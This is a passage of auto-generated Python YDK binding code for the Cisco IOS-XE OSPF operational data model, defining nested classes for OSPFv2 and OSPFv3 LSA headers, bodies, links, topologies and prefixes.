Neighbor router ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: metric Metric **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3Prefix(Entity): """ OSPFv3 prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__() self.yang_name = "ospfv3-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): """ OSPFv3 intra\-area prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class IntfMultiTopology(Entity): """ OSPF interface topology .. attribute:: name (key) One of the topology enabled on this interface **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, self).__init__() self.yang_name = "intf-multi-topology" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ]) self.name = None self._segment_path = lambda: "intf-multi-topology" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, ['name'], name, value) class AreaScopeLsa(Entity): """ List of OSPF area scope LSA .. attribute:: lsa_type (key) OSPF link scope LSA type **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: area_scope_lsa List of OSPF link scope LSAs **type**\: list of :py:class:`AreaScopeLsa_ <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, self).__init__() self.yang_name = "area-scope-lsa" self.yang_parent_name = "ospf-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type'] self._child_classes = OrderedDict([("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ]) self.lsa_type = None self.area_scope_lsa = YList(self) self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, ['lsa_type'], name, value) class AreaScopeLsa_(Entity): """ List of OSPF link scope LSAs .. attribute:: lsa_type (key) LSA Type **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: adv_router (key) Advertising router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: decoded_completed The OSPF LSA body is fully decoded **type**\: bool **config**\: False .. attribute:: raw_data The complete LSA in network byte order as received/sent over the wire **type**\: list of int **range:** 0..255 **config**\: False .. attribute:: ospfv2_lsa OSPFv2 LSA **type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa>` **config**\: False .. attribute:: ospfv2_link Router LSA link **type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link>` **config**\: False .. attribute:: ospfv2_topology Summary LSA **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology>` **config**\: False .. attribute:: ospfv2_external External LSA **type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External>` **config**\: False .. attribute:: ospfv3_lsa OSPFv3 LSA **type**\: :py:class:`Ospfv3Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa>` **config**\: False .. attribute:: ospfv3_link OSPFv3 links **type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link>` **config**\: False .. attribute:: ospfv3_prefix OSPFv3 prefix\-list **type**\: list of :py:class:`Ospfv3Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix>` **config**\: False .. attribute:: ospfv3_ia_prefix OSPFv3 intra\-area prefix\-list **type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, self).__init__() self.yang_name = "area-scope-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','adv_router'] self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])), ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])), ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])), ]) self.lsa_type = None self.adv_router = None self.decoded_completed = None self.raw_data = [] self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa() self.ospfv2_lsa.parent = self self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa" self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa() self.ospfv3_lsa.parent = self self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv3_link = YList(self) self.ospfv3_prefix = YList(self) self.ospfv3_ia_prefix = YList(self) self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value) class Ospfv2Lsa(Entity): """ OSPFv2 LSA .. attribute:: header Decoded OSPFv2 LSA header data **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header>` **config**\: False .. attribute:: lsa_body Decoded OSPFv2 LSA body data **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv2 LSA header data .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: opaque_type Opaque type **type**\: int **range:** 0..255 **config**\: False .. attribute:: opaque_id Opaque ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False .. attribute:: flag_options LSA options **type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): """ Decoded OSPFv2 LSA body data .. attribute:: num_of_links Number of links **type**\: int **range:** 0..65535 **config**\: False .. attribute:: network Network details **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network>` **config**\: False .. attribute:: summary_mask Summary mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_mask External mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: body_flag_options LSA body flags **type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): """ Network details .. attribute:: network_mask IP network mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): """ Router LSA link .. attribute:: link_id (key) Link ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_data (key) Link data **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: ospfv2_topology Topology specific information **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): """ Topology specific information .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): """ Summary LSA .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): """ External LSA .. attribute:: mt_id (key) MT\-ID for topology enabled on the link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv3Lsa(Entity): """ OSPFv3 LSA .. attribute:: header Decoded OSPFv3 LSA header **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header>` **config**\: False .. attribute:: lsa_body Decoded OSPFv3 LSA body **type**\: :py:class:`LsaBody 